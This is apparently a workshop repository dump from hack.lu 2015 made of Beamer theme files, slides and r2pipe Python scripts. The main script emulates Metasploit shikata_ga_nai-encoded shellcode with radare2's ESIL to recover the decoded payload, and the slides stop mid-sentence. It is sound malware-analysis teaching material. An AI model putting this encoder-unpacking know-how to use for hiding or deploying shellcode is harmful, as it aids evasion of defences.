| \newfontfamily\ExtraLight{Fira Sans ExtraLight} 28 | \newfontfamily\Light{Fira Sans Light} 29 | \newfontfamily\Book{Fira Sans} 30 | \newfontfamily\Medium{Fira Sans Medium} 31 | \AtBeginEnvironment{tabular}{% 32 | \setsansfont[BoldFont={Fira Sans},% 33 | Numbers={Monospaced}]{Fira Sans Light}% 34 | } 35 | \setbeamerfont{title}{family=\Book, size=\Large, shape=\scshape} 36 | \setbeamerfont{author}{family=\ExtraLight, size=\small} 37 | \setbeamerfont{date}{family=\ExtraLight, size=\small} 38 | \setbeamerfont{section title}{family=\Book, size=\Large, shape=\scshape} 39 | \setbeamerfont{block title}{family=\Book, size=\normalsize} 40 | \setbeamerfont{block title alerted}{family=\Book,size=\normalsize} 41 | \setbeamerfont{subtitle}{family=\Light, size=\fontsize{12}{14}} 42 | \setbeamerfont{frametitle}{family=\Book, size=\large, shape=\scshape} 43 | \setbeamerfont{caption}{size=\small} 44 | \setbeamerfont{caption name}{family=\Book} 45 | \setbeamerfont{description item}{family=\Book} 46 | \setbeamerfont{page number in head/foot}{size=\scriptsize} 47 | \setbeamerfont{bibliography entry author}{family=\Light, size=\normalsize} 48 | \setbeamerfont{bibliography entry title}{family=\Book, size=\normalsize} 49 | \setbeamerfont{bibliography entry location}{family=\Light, size=\normalsize} 50 | \setbeamerfont{bibliography entry note}{family=\Light, size=\small} 51 | \linespread{1.15} 52 | 53 | \endinput 54 | %% 55 | %% End of file `beamerfontthememetropolis.sty'. 56 | -------------------------------------------------------------------------------- /shikata_ga_nai/beamerinnerthememetropolis.sty: -------------------------------------------------------------------------------- 1 | %% 2 | %% This is file `beamerinnerthememetropolis.sty', 3 | %% generated with the docstrip utility. 4 | %% 5 | %% The original source files were: 6 | %% 7 | %% beamerinnerthememetropolis.dtx (with options: `package') 8 | %% --------------------------------------------------------------------------- 9 | %% Copyright 2015 Matthias Vogelgesang and the LaTeX community. A full list of 10 | %% contributors can be found at 11 | %% 12 | %% https://github.com/matze/mtheme/graphs/contributors 13 | %% 14 | %% and the original template was based on the HSRM theme by Benjamin Weiss. 15 | %% 16 | %% This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 17 | %% International License (https://creativecommons.org/licenses/by-sa/4.0/). 18 | %% --------------------------------------------------------------------------- 19 | \NeedsTeXFormat{LaTeX2e} 20 | \ProvidesPackage{beamerinnerthememetropolis}[2015/06/12 Metropolis inner theme] 21 | \RequirePackage{etoolbox} 22 | \RequirePackage{calc} 23 | \RequirePackage{pgfopts} 24 | \RequirePackage{tikz} 25 | \pgfkeys{ 26 | /metropolis/inner/block/.cd, 27 | .is choice, 28 | transparent/.code=\setlength{\@metropolis@blockskip}{0ex}, 29 | fill/.code=\setlength{\@metropolis@blockskip}{1ex}, 30 | } 31 | \pgfkeys{ 32 | /metropolis/inner/titleformat/.cd, 33 | .is choice, 34 | regular/.code=\renewcommand{\@metropolis@titleformat}{}, 35 | lowercase/.code={% 36 | \renewcommand{\@metropolis@titleformat}{\MakeLowercase} 37 | }, 38 | uppercase/.code={% 39 | \renewcommand{\@metropolis@titleformat}{\MakeUppercase} 40 | }, 41 | } 42 | \pgfkeys{ 43 | /metropolis/inner/sectiontitleformat/.cd, 44 | .is choice, 45 | regular/.code=\renewcommand{\@metropolis@sectiontitleformat}{}, 46 | lowercase/.code={% 47 | \renewcommand{\@metropolis@sectiontitleformat}{\MakeLowercase} 48 | }, 49 | uppercase/.code={% 50 | \renewcommand{\@metropolis@sectiontitleformat}{\MakeUppercase} 51 | }, 52 | } 53 | \pgfkeys{ 54 | /metropolis/inner/sectionpage/.cd, 55 | .is choice, 56 | none/.code=\@metropolis@sectionpage@none, 57 | progressbar/.code=\@metropolis@sectionpage@progressbar, 58 | } 59 | \newcommand{\@metropolis@inner@setdefaults}{ 60 | \pgfkeys{/metropolis/inner/.cd, 61 | sectionpage=progressbar, 62 | block=transparent, 63 | titleformat=lowercase, 64 | sectiontitleformat=lowercase, 65 | } 66 | } 67 | \def\@metropolis@titleformat#1{#1} 68 | \def\@metropolis@sectiontitleformat#1{#1} 69 | \patchcmd{\sectionentry} 70 | {\def\insertsectionhead{#2}} 71 | {\def\insertsectionhead{\@metropolis@sectiontitleformat{#2}}} 72 | {} 73 | {\PackageError{beamerinnerthememetropolis}{Patching section title failed.}} 74 | \patchcmd{\beamer@section} 75 | {\def\insertsectionhead{\hyperlink{Navigation\the\c@page}{#1}}} 76 | {\def\insertsectionhead{\hyperlink{Navigation\the\c@page}{\@metropolis@sectiontitleformat{#1}}}} 77 | {} 78 | {\PackageError{beamerinnerthememetropolis}{Patching section title failed.}} 79 | \setbeamertemplate{title page}{ 80 | \begin{minipage}[b][\paperheight]{\textwidth} 81 | \ifx\inserttitlegraphic\@empty\else\usebeamertemplate*{title graphic}\fi 82 | \vfill% 83 | \ifx\inserttitle\@empty\else\usebeamertemplate*{title}\fi 84 | \ifx\insertsubtitle\@empty\else\usebeamertemplate*{subtitle}\fi 85 | \usebeamertemplate*{title separator} 86 | \ifx\beamer@shortauthor\@empty\else\usebeamertemplate*{author}\fi 87 | \ifx\insertdate\@empty\else\usebeamertemplate*{date}\fi 88 | \ifx\insertinstitute\@empty\else\usebeamertemplate*{institute}\fi 89 | \vfill 90 | \vspace*{1mm} 91 | \end{minipage} 92 | } 93 | \def\maketitle{% 94 | \ifbeamer@inframe 95 | \titlepage 96 | \else 97 | \frame[plain]{\titlepage} 98 | \fi 99 | } 100 | \def\titlepage{% 101 | \usebeamertemplate{title page} 102 | } 103 | \setbeamertemplate{title graphic}{ 104 | \vbox to 0pt { 105 | \vspace*{2em} 106 | \inserttitlegraphic% 107 | }% 108 | \nointerlineskip% 109 | } 110 | \setbeamertemplate{title}{ 111 | \raggedright% 112 | \linespread{1.0}% 113 | \@metropolis@titleformat{\inserttitle}% 114 | \par% 115 | \vspace*{0.5em} 116 | } 117 | \setbeamertemplate{subtitle}{ 118 | \insertsubtitle% 119 | \par% 120 | \vspace*{0.5em} 121 | } 122 | \setbeamertemplate{title separator}{ 123 | \begin{tikzpicture} 124 | \draw[fg] (0, 0) -- (\textwidth, 0); 125 | \end{tikzpicture}% 126 | \par% 127 | } 128 | \setbeamertemplate{author}{ 129 | \vspace*{2em} 130 | \insertauthor% 131 | \par% 132 | \vspace*{0.25em} 133 | } 134 | \setbeamertemplate{date}{ 135 | \insertdate% 136 | \par% 137 | } 138 | \setbeamertemplate{institute}{ 139 | \vspace*{3mm} 140 | \insertinstitute% 141 | \par% 142 | } 143 | \newcommand{\@metropolis@sectionpage@none}{ 144 | \AtBeginSection{ 145 | % intenionally empty 146 | } 147 | } 148 | \defbeamertemplate{section page}{progressbar}{ 149 | \centering 150 | \begin{minipage}{22em} 151 | \usebeamercolor[fg]{section title} 152 | \usebeamerfont{section title} 153 | \insertsectionhead\\[-1ex] 154 | \usebeamertemplate*{progress bar in section page} 155 | \end{minipage} 156 | \par 157 | } 158 | \newcommand{\@metropolis@sectionpage@progressbar}{ 159 | \setbeamertemplate{section page}[progressbar] 160 | \AtBeginSection{ 161 | \ifbeamer@inframe 162 | \sectionpage 163 | \else 164 | \frame[plain,c]{\sectionpage} 165 | \fi 166 | } 167 | } 168 | \newlength{\metropolis@progressonsectionpage} 169 | \setbeamertemplate{progress bar in section page}{ 170 | \setlength{\metropolis@progressonsectionpage}{% 171 | \textwidth * \ratio{\insertframenumber pt}{\inserttotalframenumber pt}% 172 | }% 173 | \begin{tikzpicture} 174 | \draw[bg, fill=bg] (0,0) rectangle (\textwidth, 0.4pt); 175 | \draw[fg, fill=fg] (0,0) rectangle (\metropolis@progressonsectionpage, 0.4pt); 176 | \end{tikzpicture}% 177 | } 178 | \def\inserttotalframenumber{100} 179 | \newlength{\@metropolis@blockskip} 180 | \setbeamertemplate{block begin}{% 181 | \vspace*{1ex} 182 | \begin{beamercolorbox}[% 183 | ht=2.4ex, 184 | dp=1ex, 185 | leftskip=\@metropolis@blockskip, 186 | rightskip=\@metropolis@blockskip]{block title} 187 | \usebeamerfont*{block title}\insertblocktitle% 188 | \end{beamercolorbox}% 189 | \vspace*{-1pt} 190 | \usebeamerfont{block body}% 191 | \begin{beamercolorbox}[% 192 | dp=1ex, 193 | leftskip=\@metropolis@blockskip, 194 | rightskip=\@metropolis@blockskip, 195 | vmode]{block body}% 196 | } 197 | \setbeamertemplate{block end}{% 198 | \end{beamercolorbox} 199 | \vspace*{0.2ex} 200 | } 201 | \setbeamertemplate{block alerted begin}{% 202 | \vspace*{1ex} 203 | \begin{beamercolorbox}[% 204 | ht=2.4ex, 205 | dp=1ex, 206 | leftskip=\@metropolis@blockskip, 207 | rightskip=\@metropolis@blockskip]{block title alerted} 208 | \usebeamerfont*{block title alerted}\insertblocktitle% 209 | \end{beamercolorbox}% 210 | \vspace*{-1pt} 211 | \usebeamerfont{block body alerted}% 212 | \begin{beamercolorbox}[% 213 | dp=1ex, 214 | leftskip=\@metropolis@blockskip, 215 | rightskip=\@metropolis@blockskip, 216 | vmode]{block body}% 217 | } 218 | \setbeamertemplate{block alerted end}{% 219 | \end{beamercolorbox} 220 | \vspace*{0.2ex} 221 | } 222 | \setbeamertemplate{block example begin}{% 223 | \vspace*{1ex} 224 | \begin{beamercolorbox}[% 225 | ht=2.4ex, 226 | dp=1ex, 227 | leftskip=\@metropolis@blockskip, 228 | rightskip=\@metropolis@blockskip]{block title example} 229 | \usebeamerfont*{block title example}\insertblocktitle% 230 | \end{beamercolorbox}% 231 | \vspace*{-1pt} 232 | \usebeamerfont{block body example}% 233 | \begin{beamercolorbox}[% 234 | dp=1ex, 235 | leftskip=\@metropolis@blockskip, 236 | rightskip=\@metropolis@blockskip, 237 | vmode]{block body}% 238 | } 239 | \setbeamertemplate{block example end}{% 240 | \end{beamercolorbox} 241 | \vspace*{0.2ex} 242 | } 243 | \setbeamertemplate{itemize items}{\textbullet} 244 | \setbeamertemplate{caption label separator}{: } 245 | \setbeamertemplate{caption}[numbered] 246 | \setbeamertemplate{footnote}{% 247 | \parindent 0em\noindent% 248 | \raggedright 249 | \usebeamercolor{footnote}\hbox to 0.8em{\hfil\insertfootnotemark}\insertfootnotetext\par% 250 | } 251 | \setlength{\parskip}{0.5em} 252 | \linespread{1.15} 253 | \define@key{beamerframe}{c}[true]{% centered 254 | \beamer@frametopskip=0pt plus 1fill\relax% 255 | \beamer@framebottomskip=0pt plus 1fill\relax% 256 | \beamer@frametopskipautobreak=0pt plus .4\paperheight\relax% 257 | \beamer@framebottomskipautobreak=0pt plus .6\paperheight\relax% 258 | \def\beamer@initfirstlineunskip{}% 259 | } 260 | \@metropolis@inner@setdefaults 261 | \ProcessPgfPackageOptions{/metropolis/inner} 262 | \endinput 263 | %% 264 | %% End of file `beamerinnerthememetropolis.sty'. 265 | -------------------------------------------------------------------------------- /shikata_ga_nai/beamerouterthememetropolis.sty: -------------------------------------------------------------------------------- 1 | %% 2 | %% This is file `beamerouterthememetropolis.sty', 3 | %% generated with the docstrip utility. 4 | %% 5 | %% The original source files were: 6 | %% 7 | %% beamerouterthememetropolis.dtx (with options: `package') 8 | %% --------------------------------------------------------------------------- 9 | %% Copyright 2015 Matthias Vogelgesang and the LaTeX community. A full list of 10 | %% contributors can be found at 11 | %% 12 | %% https://github.com/matze/mtheme/graphs/contributors 13 | %% 14 | %% and the original template was based on the HSRM theme by Benjamin Weiss. 15 | %% 16 | %% This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 17 | %% International License (https://creativecommons.org/licenses/by-sa/4.0/). 18 | %% --------------------------------------------------------------------------- 19 | \NeedsTeXFormat{LaTeX2e} 20 | \ProvidesPackage{beamerouterthememetropolis}[2015/06/12 Metropolis outer theme] 21 | \RequirePackage{etoolbox} 22 | \RequirePackage{calc} 23 | \RequirePackage{pgfopts} 24 | \pgfkeys{ 25 | /metropolis/outer/numbering/.cd, 26 | .is choice, 27 | none/.code=\setbeamertemplate{frame numbering}[none], 28 | counter/.code=\setbeamertemplate{frame numbering}[counter], 29 | fraction/.code=\setbeamertemplate{frame numbering}[fraction], 30 | } 31 | \pgfkeys{ 32 | /metropolis/outer/progressbar/.cd, 33 | .is choice, 34 | none/.code={% 35 | \setbeamertemplate{headline}[plain] 36 | \setbeamertemplate{frametitle}[plain] 37 | \setbeamertemplate{footline}[plain] 38 | }, 39 | head/.code={\pgfkeys{/metropolis/outer/progressbar=none} 40 | \addtobeamertemplate{headline}{}{\usebeamertemplate*{progress bar in head/foot}} 41 | }, 42 | frametitle/.code={\pgfkeys{/metropolis/outer/progressbar=none} 43 | \addtobeamertemplate{frametitle}{}{\usebeamertemplate*{progress bar in head/foot}} 44 | }, 45 | foot/.code={\pgfkeys{/metropolis/outer/progressbar=none} 46 | \addtobeamertemplate{footline}{}{\usebeamertemplate*{progress bar in head/foot}} 47 | }, 48 | } 49 | \pgfkeys{ 50 | /metropolis/outer/frametitleformat/.cd, 51 | .is choice, 52 | regular/.code={% 53 | \renewcommand{\@metropolis@frametitleformat}{}% 54 | \renewcommand{\@metropolis@frametitlestrut}{% 55 | \rule{0pt}{\heightof{ABCDEFGHIJKLMNOPQRSTUVWXYZ}} 56 | } 57 | }, 58 | lowercase/.code={% 59 | \renewcommand{\@metropolis@frametitleformat}{\MakeLowercase}% 60 | \renewcommand{\@metropolis@frametitlestrut}{% 61 | \rule{0pt}{\heightof{abcdefghijklmnopqrstuvwxyz}} 62 | } 63 | }, 64 | uppercase/.code={% 65 | \renewcommand{\@metropolis@frametitleformat}{\MakeUppercase}% 66 | \renewcommand{\@metropolis@frametitlestrut}{% 67 | \rule{0pt}{\heightof{ABCDEFGHIJKLMNOPQRSTUVWXYZ}} 68 | } 69 | }, 70 | } 71 | \newcommand{\@metropolis@outer@setdefaults}{ 72 | \pgfkeys{/metropolis/outer/.cd, 73 | numbering=counter, 74 | progressbar=none, 75 | frametitleformat=lowercase, 76 | } 77 | } 78 | \setbeamertemplate{navigation symbols}{} 79 | \defbeamertemplate{frame numbering}{none}{} 80 | \defbeamertemplate{frame numbering}{counter}{\insertframenumber} 81 | \defbeamertemplate{frame numbering}{fraction}{ 82 | \insertframenumber/\inserttotalframenumber 83 | } 84 | \defbeamertemplate{headline}{plain}{} 85 | \defbeamertemplate{footline}{plain}{% 86 | \begin{beamercolorbox}[wd=\textwidth, sep=3ex]{footline}% 87 | \hfill% 88 | \usebeamerfont{page number in head/foot}% 89 | \usebeamertemplate*{frame numbering} 90 | \end{beamercolorbox}% 91 | } 92 | \def\@metropolis@frametitleformat#1{#1} 93 | \patchcmd{\beamer@@frametitle} 94 | {\beamer@ifempty{#2}{}{% 95 | \gdef\insertframetitle{{#2\ifnum\beamer@autobreakcount>0\relax{}\space\usebeamertemplate*{frametitle continuation}\fi}}% 96 | \gdef\beamer@frametitle{#2}% 97 | \gdef\beamer@shortframetitle{#1}% 98 | }} 99 | {\beamer@ifempty{#2}{}{% 100 | \gdef\insertframetitle{{\@metropolis@frametitleformat{#2}\ifnum\beamer@autobreakcount>0\relax{}\space\usebeamertemplate*{frametitle continuation}\fi}}% 101 | \gdef\beamer@frametitle{#2}% 102 | \gdef\beamer@shortframetitle{#1}% 103 | }} 104 | {} 105 | {\PackageError{beamerouterthememetropolis}{Patching frame title failed.}} 106 | \newlength{\@metropolis@frametitlestrut} 107 | \defbeamertemplate{frametitle}{plain}{% 108 | \nointerlineskip% 109 | \begin{beamercolorbox}[% 110 | wd=\paperwidth,% 111 | sep=1.5ex,% 112 | ]{frametitle}% 113 | \@metropolis@frametitlestrut\insertframetitle\@metropolis@frametitlestrut% 114 | \end{beamercolorbox}% 115 | } 116 | \newlength{\metropolis@progressinheadfoot} 117 | \setbeamertemplate{progress bar in head/foot}{ 118 | \nointerlineskip 119 | \setlength{\metropolis@progressinheadfoot}{% 120 | \paperwidth * \ratio{\insertframenumber pt}{\inserttotalframenumber pt}% 121 | }% 122 | \begin{beamercolorbox}[wd=\paperwidth]{progress bar in head/foot} 123 | \begin{tikzpicture} 124 | \draw[bg, fill=bg] (0,0) rectangle (\paperwidth, 0.4pt); 125 | \draw[fg, fill=fg] (0,0) rectangle (\metropolis@progressinheadfoot, 0.4pt); 126 | \end{tikzpicture}% 127 | \end{beamercolorbox} 128 | } 129 | \@metropolis@outer@setdefaults 130 | \ProcessPgfPackageOptions{/metropolis/outer} 131 | \endinput 132 | %% 133 | %% End of file `beamerouterthememetropolis.sty'. 134 | -------------------------------------------------------------------------------- /shikata_ga_nai/beamerthemem.sty: -------------------------------------------------------------------------------- 1 | %% 2 | %% This is file `beamerthemem.sty', 3 | %% generated with the docstrip utility. 4 | %% 5 | %% The original source files were: 6 | %% 7 | %% beamerthemem.dtx (with options: `package') 8 | %% --------------------------------------------------------------------------- 9 | %% Copyright 2015 Matthias Vogelgesang and the LaTeX community. A full list of 10 | %% contributors can be found at 11 | %% 12 | %% https://github.com/matze/mtheme/graphs/contributors 13 | %% 14 | %% and the original template was based on the HSRM theme by Benjamin Weiss. 15 | %% 16 | %% This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 17 | %% International License (https://creativecommons.org/licenses/by-sa/4.0/). 18 | %% --------------------------------------------------------------------------- 19 | \NeedsTeXFormat{LaTeX2e} 20 | \ProvidesPackage{beamerthemem}[2015/06/12 Metropolis Beamer theme] 21 | \RequirePackage{etoolbox} 22 | \RequirePackage{pgfopts} 23 | \RequirePackage{ifxetex} 24 | \RequirePackage{ifluatex} 25 | \newcommand{\metroset}[1]{\pgfkeys{/metropolis/.cd,#1}} 26 | \pgfkeys{/metropolis/.cd, 27 | .search also={ 28 | /metropolis/inner, 29 | /metropolis/outer, 30 | /metropolis/color, 31 | }, 32 | block/.code=\pgfkeysalso{ 33 | inner/block=#1, 34 | color/block=#1, 35 | }, 36 | } 37 | \pgfkeys{ 38 | /metropolis/plaintitleformat/.cd, 39 | .is choice, 40 | regular/.code=\renewcommand{\@metropolis@plaintitleformat}{#1}, 41 | lowercase/.code={% 42 | \renewcommand{\@metropolis@plaintitleformat}{\MakeLowercase{#1}} 43 | }, 44 | uppercase/.code={% 45 | \renewcommand{\@metropolis@plaintitleformat}{\MakeUppercase{#1}} 46 | }, 47 | } 48 | \pgfkeys{ 49 | /metropolis/everytitleformat/.code=\pgfkeysalso{ 50 | inner/titleformat=#1, 51 | inner/sectiontitleformat=#1, 52 | outer/frametitleformat=#1, 53 | plaintitleformat=#1, 54 | } 55 | } 56 | \pgfkeys{/metropolis/.cd, 57 | usetitleprogressbar/.code=\pgfkeysalso{outer/progressbar=frametitle}, 58 | noslidenumbers/.code=\pgfkeysalso{outer/numbering=none}, 59 | usetotalslideindicator/.code=\pgfkeysalso{outer/numbering=fraction}, 60 | nosectionslide/.code=\pgfkeysalso{inner/sectionpage=none}, 61 | darkcolors/.code=\pgfkeysalso{color/background=dark}, 62 | blockbg/.code=\pgfkeysalso{color/block=fill, inner/block=fill}, 63 | } 64 | \newcommand{\@metropolis@setdefaults}{ 65 | \pgfkeys{/metropolis/.cd, 66 | plaintitleformat=lowercase, 67 | } 68 | } 69 | \useinnertheme{metropolis} 70 | \useoutertheme{metropolis} 71 | \usecolortheme{metropolis} 72 | \ifboolexpr{bool {xetex} or bool {luatex}}{ 73 | \usefonttheme{metropolis} 74 | }{ 75 | \PackageWarning{beamerthemem}{% 76 | You need to compile with XeLaTeX or LuaLaTeX to use the Fira fonts. 77 | } 78 | } 79 | \AtEndPreamble{% 80 | \@ifpackageloaded{pgfplots}{% 81 | \RequirePackage{pgfplotsthemetol} 82 | }{} 83 | } 84 | \def\@metropolis@plaintitleformat#1{#1} 85 | \newcommand{\plain}[2][]{% 86 | \begingroup 87 | \setbeamercolor{background canvas}{ 88 | use=palette primary, 89 | parent=palette primary 90 | } 91 | \begin{frame}[c]{#1} 92 | \begin{center} 93 | \usebeamercolor[fg]{palette primary} 94 | \usebeamerfont{section title} 95 | \@metropolis@plaintitleformat{#2} 96 | \end{center} 97 | \end{frame} 98 | \endgroup 99 | } 100 | \newcommand{\mreducelistspacing}{\vspace{-\topsep}} 101 | \@metropolis@setdefaults 102 | \ProcessPgfOptions{/metropolis} 103 | \endinput 104 | %% 105 | %% End of file `beamerthemem.sty'. 106 | -------------------------------------------------------------------------------- /shikata_ga_nai/execve.shellcode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/shikata_ga_nai/execve.shellcode -------------------------------------------------------------------------------- /shikata_ga_nai/hello.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import r2pipe 3 | 4 | r2 = r2pipe.open(sys.argv[1]) 5 | print('The five first instructions:\n%s\n' % r2.cmd('pi 5')) 6 | print('And now in JSON:\n%s\n' % r2.cmdj('pij 5')) 7 | print('architecture: %s' % r2.cmdj('ij')['bin']['machine']) 8 | 9 | 10 | -------------------------------------------------------------------------------- /shikata_ga_nai/pix/description.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/shikata_ga_nai/pix/description.png -------------------------------------------------------------------------------- /shikata_ga_nai/pix/esil.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/shikata_ga_nai/pix/esil.png -------------------------------------------------------------------------------- /shikata_ga_nai/pix/fpu.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/shikata_ga_nai/pix/fpu.png -------------------------------------------------------------------------------- /shikata_ga_nai/pix/fpus.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/shikata_ga_nai/pix/fpus.png -------------------------------------------------------------------------------- /shikata_ga_nai/pix/r2pipe.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/shikata_ga_nai/pix/r2pipe.png -------------------------------------------------------------------------------- /shikata_ga_nai/pix/solution.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/shikata_ga_nai/pix/solution.png -------------------------------------------------------------------------------- /shikata_ga_nai/shellcode.shikata_ga_nai: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/shikata_ga_nai/shellcode.shikata_ga_nai -------------------------------------------------------------------------------- /shikata_ga_nai/shikataganai.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import r2pipe 3 | 4 | def initESIL(): 5 | r.cmd('e io.cache=true') 6 | r.cmd('e asm.bits=32') 7 | r.cmd('aei') 8 | r.cmd('aeim 0xffffd000 0x2000 stack') 9 | r.cmd('.ar*') # set all registers to zero 10 | r.cmd('aer esp=0xffffd000') 11 | r.cmd('aer ebp=0xffffd000') 12 | 13 | def dump (start): 14 | 15 | end = r.cmdj('oj')[0]['size'] # size of the opened object 16 | 17 | print(r.cmd('pD %d @ %d' % (end-start, start))) # disassembly 18 | 19 | raw = r.cmdj('p8j %d @ %d' % (end-start, start)) # dump 20 | with open('out', 'w') as f: 21 | f.write(''.join(map(chr, raw))) 22 | 23 | 24 | def decode(r): 25 | lastfpu = 0 26 | lastloop = 0 27 | 28 | for i in range(100000): 29 | current_op = r.cmdj('pdj 1 @ eip')[0] 30 | 31 | # End of shellcode or invalid opcode 32 | if current_op['type'] == 'invalid': 33 | dump(lastloop) 34 | return 35 | 36 | # ESIL doesn't implement FPU (yet), 37 | # but we don't care, since they are only used 38 | # to get EIP with the FNSTENV technique 39 | # (http://gynvael.coldwind.pl/n/eip_from_fpu_x86). 40 | # 41 | # So we take note of the offset of the latest FPU instruction, 42 | # on put it in `esp` when `fnstenv` is encounted. 43 | if current_op['family'] == 'fpu': 44 | if current_op['opcode'].startswith('fnstenv'): 45 | r.cmd('wv %d @ esp' % lastfpu) 46 | else: 47 | lastfpu = current_op['offset'] 48 | 49 | # Check for end of loop opcodes 50 | if current_op['opcode'].startswith('loop') and r.cmdj('arj')['ecx'] <= 1: 51 | lastloop = current_op['offset'] + current_op['size']; 52 | 53 | r.cmd('aes') 54 | 55 | print('[-] We emulated %d instructions, giving up' % i) 56 | 57 | 58 | if len(sys.argv) != 2: 59 | print('[*] Usage: %s sample' % sys.argv[0]) 60 | sys.exit(0) 61 | 62 | r = r2pipe.open(sys.argv[1]) 63 | r.cmd('e asm.comments=false'); 64 | r.cmd('e asm.lines=false'); 65 | r.cmd('e asm.flags=false'); 66 | initESIL() 67 | decode(r) 68 | -------------------------------------------------------------------------------- /shikata_ga_nai/slides.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/shikata_ga_nai/slides.pdf -------------------------------------------------------------------------------- /shikata_ga_nai/slides.tex: -------------------------------------------------------------------------------- 1 | \documentclass{beamer} 2 | 3 | \usepackage[english]{ babel } 4 | \usepackage[T1]{ fontenc } 5 | \usepackage{ graphicx } 6 | \graphicspath{ {./pix/} } 7 | 8 | \usetheme[block=fill]{m} 9 | 10 | \title{Shikata ga nai} 11 | \author{Radare2 workshop} 12 | \date{\today} 13 | \institute{hack.lu 2015} 14 | 15 | \begin{document} 16 | 17 | \maketitle 18 | 19 | \begin{frame}{Disclaimer} 20 | \begin{center} 21 | This workshop is based on ideas and scripts from\\ 22 | Jaime (\alert{@NighetMan}) Peñalba. 23 | \end{center} 24 | \end{frame} 25 | 26 | \begin{frame}{Where to find the material?} 27 | \begin{center} 28 | Please look at the \alert{shikata\_ga\_nai} folder in the virtual machine 29 | \end{center} 30 | \end{frame} 31 | 32 | \section{What are we going to do?} 33 | 34 | \begin{frame}{Shikata ga nai} 35 | \begin{center} 36 | Unpack \alert{Shikata ga nai}! 37 | \end{center} 38 | \includegraphics[width=\textwidth]{description.png} 39 | \end{frame} 40 | 41 | \begin{frame}{Shikata ga nai} 42 | \begin{itemize} 43 | \item Polymorphic 44 | \item 320 lines of msf-powered OOP Ruby 45 | \item We want the unpacked shellcode 46 | \end{itemize} 47 | \end{frame} 48 | 49 | \section{How do we do it?} 50 | 51 | \begin{frame}{Solutions} 52 | \begin{itemize}[<+->] 53 | \item Run it on your machine and see what happens 54 | \item Step-step-step-step-step-… in gdb 55 | \item Trace the execution in a virtual machine 56 | \item Use radare2 with \alert{ESIL}! 57 | \end{itemize} 58 | \end{frame} 59 | 60 | \section{But what is ESIL?} 61 | 62 | \begin{frame}{ESIL} 63 | \begin{itemize} 64 | \item Evaluable String Intermediary Language 65 | \item Yet another intermediary language 66 | \item RPN-ish 67 | \item \alert{$jz\;0xaabbccdd$} : $zf,?{,0xaabbccdd,eip,=,}$ 68 | \end{itemize} 69 | \end{frame} 70 | 71 | \section{What can we do with this \emph{ESIL}?} 72 | 73 | \begin{frame}{ESIL} 74 | \begin{columns} 75 | \begin{column}{.4\textwidth} 76 | \begin{itemize} 77 | \item Used for 78 | \begin{itemize}[<+->] 79 | \item Emulation 80 | \item Decompilation 81 | \item Analysis 82 | \item Flamewars against other IL 83 | \end{itemize} 84 | \end{itemize} 85 | \end{column} 86 | \begin{column}{.6\textwidth} 87 | \includegraphics[width=\textwidth]{esil.png} 88 | \end{column} 89 | \end{columns} 90 | \end{frame} 91 | 92 | \section{How does emulation help us to dump the shellcode?} 93 | 94 | \begin{frame}{Where to stop?} 95 | We can emulate the shellcode, but \alert{where} do we stop? 96 | \begin{itemize} 97 | \item Instructions aren't fixed. 98 | \item Blocks are permutated. 99 | \item Registers are dynamically selected. 100 | \end{itemize} 101 | \begin{center} 102 | So what can we do? 103 | \end{center} 104 | \end{frame} 105 | 106 | \begin{frame}{Reading the source code} 107 | It seems that the last instruction will always be \alert{loop}. 108 | \newline 109 | \newline 110 | \pause 111 | So we can emulate the shellcode, and dump the result from the last \alert{loop} instruction 112 | till then end. 113 | \end{frame} 114 | 115 | \section{How do we use radare2/ESIL anyway?} 116 | 117 | \begin{frame}{r2pipe} 118 | \includegraphics[width=\textwidth]{r2pipe.png} 119 | \end{frame} 120 | 121 | \begin{frame}{Languages} 122 | \begin{block}{NodeJS} 123 | npm install r2pipe 124 | \end{block} 125 | \begin{block}{Python} 126 | pip install r2pipe 127 | \end{block} 128 | \begin{block}{Ruby} 129 | gem install r2pipe 130 | \end{block} 131 | \end{frame} 132 | 133 | \section{So let's use ESIL?} 134 | 135 | \begin{frame}{Plot twist} 136 | \only<1>{ 137 | \begin{itemize} 138 | \item FPU is currently not supported in ESIL :D 139 | \item FPU is used to get EIP with \alert{FNSTENV} 140 | \item Polymorphic FPU instructions 141 | \end{itemize} 142 | } 143 | \only<2>{ 144 | \includegraphics[width=\textwidth]{fpu.png} 145 | } 146 | \end{frame} 147 | 148 | \section{Can we emulate them the \emph{ghetto way}?} 149 | 150 | \begin{frame}{Are those detected as FPU by r2?} 151 | \begin{itemize} 152 | \item You've got the \alert{hello\_world.py} code 153 | \item Check if every opcode in the \alert{test\_fpu.py} one has the \alert{fpu} family 154 | \item Feel free to do it in your favourite language! 155 | \end{itemize} 156 | \end{frame} 157 | 158 | \begin{frame}{My solution} 159 | \includegraphics[width=\textwidth]{fpus.png} 160 | \end{frame} 161 | 162 | \section{Ready to unpack shikata ga nai?} 163 | 164 | \begin{frame}{Sum up} 165 | \begin{enumerate} 166 | \item Initialize the ESIL vm 167 | \item If the instruction is \alert{invalid} 168 | \begin{enumerate} 169 | \item We're at the end! 170 | \item Dump from the last encountered \alert{loop} instruction to the end 171 | \end{enumerate} 172 | \item Else, if the instruction is an fpu one 173 | \begin{enumerate} 174 | \item If it's \alert{fnstenv}, write the previously 